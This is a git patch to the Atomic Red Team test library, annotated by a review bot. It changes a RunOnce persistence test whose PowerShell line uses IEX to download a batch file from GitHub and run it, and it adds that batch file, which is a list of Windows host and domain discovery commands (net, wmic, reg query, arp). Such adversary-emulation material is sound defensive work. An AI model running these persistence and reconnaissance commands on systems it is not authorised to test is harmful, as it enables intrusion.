From 08f1fdcc2b4d350d975d9f481b29815cf9585e2e Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Mon, 13 Mar 2023 12:40:49 -0600
Subject: [PATCH] use ART repo instead of ARTifacts (#2361)

* use ART repo instead of ARTifacts

* typo fix
---
 atomics/T1547.001/T1547.001.yaml | 5 ++--
 atomics/T1547.001/src/Discovery.bat | 44 +++++++++++++++++++++++++++++
 2 files changed, 47 insertions(+), 2 deletions(-)
 create mode 100644 atomics/T1547.001/src/Discovery.bat

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 696b3681..92b7f610 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -59,7 +59,7 @@ atomic_tests:
   executor:
     command: |
       $RunOnceKey = "#{reg_key_path}"
-      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
     cleanup_command: |
       Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
     name: powershell
@@ -106,7 +106,8 @@ atomic_tests:
 - name: Suspicious bat file run from startup Folder
   auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
   description: |
-    bat files can be placed in and executed from the startup folder to maintain persistance.
+    bat files can be placed in and executed from the startup folder to maintain persistance
+    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.
   supported_platforms:
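Review bot: The new `+ set-itemproperty` line in the `@@ -59,7 +59,7 @@` hunk fetches Discovery.bat from the mutable `raw/master/...` path, whereas the removed line pinned it to commit 36f83b728bc26a49eacb0535edc42be8c377ac54; whatever `master` holds when the RunOnce entry fires is what `IEX` executes, so the test is no longer reproducible and any later edit to Discovery.bat silently changes what every existing copy of this test runs. If tracking the branch is intended, state that in the test's description (which sits outside this hunk); otherwise pin the path, e.g. `https://github.com/redcanaryco/atomic-red-team/raw/<commit-sha>/atomics/T1547.001/src/Discovery.bat` with `<commit-sha>` being the commit that adds the file. The `github.com/.../raw/...` form is served through a redirect to raw.githubusercontent.com; `Net.WebClient.DownloadString` is expected to follow it, but that is worth confirming on a target host since the old URL hit raw.githubusercontent.com directly.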
diff --git a/atomics/T1547.001/src/Discovery.bat b/atomics/T1547.001/src/Discovery.bat
new file mode 100644
index 00000000..46677d8d
--- /dev/null
+++ b/atomics/T1547.001/src/Discovery.bat
@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc.exe query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser
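Review bot: Four `reg query` lines leave the `Windows NT` segment of the key unquoted (the `Winlogon\Notify`, `Winlogon\Userinit` and both `Winlogon\\Shell` lines), so the space splits the key into two arguments and reg.exe will most likely report an invalid-syntax error rather than the value, while the earlier `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"` line quotes the same prefix; quote these the same way, e.g. `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"`. The doubled backslash in the two `Winlogon\\Shell` paths differs from every other path in the file and looks like a typo. `net Accounts` near the top repeats `net accounts` further down, so one of them can be dropped. A header such as `REM Host and domain discovery commands; fetched and run by the T1547.001 RunOnce atomic test (see T1547.001.yaml)` would tell a reader where this file is consumed, since the batch file itself carries no comment.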